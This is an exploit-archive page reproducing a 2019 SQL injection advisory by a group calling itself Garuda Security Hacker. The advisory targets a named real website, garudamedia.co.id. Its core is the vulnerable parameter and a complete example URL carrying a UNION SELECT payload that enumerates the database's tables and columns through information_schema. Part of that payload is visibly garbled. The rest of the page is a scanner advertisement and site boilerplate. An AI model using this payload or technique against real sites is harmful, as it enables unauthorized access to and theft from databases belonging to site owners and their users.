Advertisement


Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.today


Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019100102

Below is a copy:

Garuda Media SQL injection
#################################
# Exploit Title : Garuda Media SQL INJECTION
# Author [ Discovered By ] : 5TUOP1D-BOY 
# Team : GARUDA SECURITY HACKER
# Dork: N/A
# Date : 14/10/2019
# Vendor : http://garudamedia.co.id
# Tested On : Windows 7
# Exploit Risk : Medium
#################################
# Admin Panel Login Path :
**********************

use u brain

# SQL Injection Exploit :
**********************

materi_pelajaran.php?kat=[SQL INJECTION]&page=

##################################
#Example
**********************

http://garudamedia.co.id/materi_pelajaran.php?kat=501%27UNION+SELECT+1,2,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)[email protected]:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),4,5,6,7,8,9--+&page=

##################################

# Example Sql Database Error :
*************************

Blank Page

##################################
Discovered By 5TUP1D-BOY From Garuda Security Hacker

Copyright ©2019 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.